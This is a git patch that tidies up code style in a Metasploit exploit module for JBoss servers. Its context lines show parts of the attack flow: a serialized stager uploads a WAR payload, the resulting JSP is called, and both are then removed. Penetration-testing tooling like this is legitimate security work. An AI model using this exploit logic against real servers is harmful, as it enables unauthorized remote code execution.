From b003d8f750b46df8d119f31df77b8960f25e752a Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Thu, 22 Jan 2015 18:17:14 -0600
Subject: [PATCH] Do final cleanup

---
 .../multi/http/jboss_invoke_deploy.rb         | 22 +++++++------------
 1 file changed, 8 insertions(+), 14 deletions(-)

diff --git a/modules/exploits/multi/http/jboss_invoke_deploy.rb b/modules/exploits/multi/http/jboss_invoke_deploy.rb
index 88dc8abfd5..e83daa567b 100644
--- a/modules/exploits/multi/http/jboss_invoke_deploy.rb
+++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb
@@ -121,7 +121,6 @@ class Metasploit4 < Msf::Exploit::Remote
       print_status("Using manually select target: \"#{mytarget.name}\"")
     end
 
-
     # We use a already serialized stager to deploy the final payload
     regex_stager_app_base = rand_text_alpha(14)
     regex_stager_jsp_name = rand_text_alpha(14)
@@ -161,7 +160,7 @@ class Metasploit4 < Msf::Exploit::Remote
         name_parameter => app_base,
         content_parameter => b64_war
       }
-    }, 20)
+    })
 
     payload_uri = "/#{app_base}/#{jsp_name}.jsp"
     print_status("Calling payload: " + payload_uri)
@@ -170,9 +169,7 @@ class Metasploit4 < Msf::Exploit::Remote
     # Remove the payload through  stager
     print_status("Removing payload through stager")
     delete_payload_uri = stager_uri + "?#{name_parameter}=#{app_base}"
-    res = send_request_cgi(
-      {'uri'     => delete_payload_uri,
-    })
+    res = send_request_cgi({'uri' => delete_payload_uri})
 
     # Remove the stager
     print_status("Removing stager")
@@ -225,14 +222,11 @@ catch(Exception e) {}
 %>
 EOT
 
-  # The script must be exactly 810 characters long, otherwise we might have serialization issues
-  # Therefore we fill the rest wit spaces
-  spaces  = " " * (810 - stager_script.length)
-  stager_script << spaces
   end
 
 
   def send_serialized_request(file_name , replace_params = {})
+    data = ''
     case file_name
     when 'version.bin'
       data = build_get_version.encode
@@ -286,7 +280,7 @@ EOT
     # JBoss might need some time for the deployment. Try 5 times at most and
     # wait 5 seconds inbetween tries
     num_attempts.times do |attempt|
-      if (verb == "POST")
+      if verb == "POST"
         res = send_request_cgi(
           {
             'uri'    => uri,
@@ -303,16 +297,16 @@ EOT
       end
 
       msg = nil
-      if (!res)
+      if res.nil?
         msg = "Execution failed on #{uri} [No Response]"
-      elsif (res.code < 200 or res.code >= 300)
+      elsif res.code < 200 || res.code >= 300
         msg = "http request failed to #{uri} [#{res.code}]"
-      elsif (res.code == 200)
+      elsif res.code == 200
         print_status("Successfully called '#{uri}'") if datastore['VERBOSE']
         return res
       end
 
-      if (attempt < num_attempts - 1)
+      if attempt < num_attempts - 1
         msg << ", retrying in 5 seconds..."
         print_status(msg) if datastore['VERBOSE']
         select(nil, nil, nil, 5)